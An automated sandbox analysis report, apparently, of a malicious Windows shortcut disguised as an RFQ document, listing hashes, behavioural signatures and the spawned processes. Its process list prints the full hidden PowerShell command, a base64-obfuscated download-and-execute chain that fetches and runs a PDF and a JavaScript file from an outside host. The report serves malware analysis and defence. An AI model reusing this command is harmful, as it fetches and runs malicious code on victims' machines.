Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
16-11-2024 05:07
Static task
static1
Behavioral task
behavioral1
Sample
Saturday Nov 16 RFQ 120HQ.lnk
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
Saturday Nov 16 RFQ 120HQ.lnk
-
Size
215KB
-
MD5
614423a0f5b8a21a0ae2d957b46cef3c
-
SHA1
529c5271a1b4cef778dc48b2dd6edfeddd24c38c
-
SHA256
506db308fda3797a3474eab41654ba925cd3ba3582f638b92400ba3767294de6
-
SHA512
6dd13c5927b99c804e20ed0412d7279c40ddbce7c626e536c2d4a11e6455203c82780db5d53fda5552fdf590633c76e83c0c6aaaf83e3c2d528e9e5a59298af4
-
SSDEEP
6144:M+HZ4aKBKefy7xCfE2CQT7FSwehrQWatIJEr0a6NQ:M+mGwy70fHCQThS9Z2aaMQ
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2764 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 564 wrote to memory of 2764 564 cmd.exe 31 PID 564 wrote to memory of 2764 564 cmd.exe 31 PID 564 wrote to memory of 2764 564 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Saturday Nov 16 RFQ 120HQ.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$6VcZuEYj = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC93VkVQei5wZGYgLU91dEZpbGUgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvdHdCa1guanMgLU91dEZpbGUgJGVudjpURU1QXGFVSXFLcC5qcztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxhVUlxS3AuanM7JGNsPSdNU093U0YnOyRjbD0nTVNPd1NGJztFeGl0';$ZSr2rv13TMa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($6VcZuEYj));Invoke-Expression -Command $ZSr2rv13TMa"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-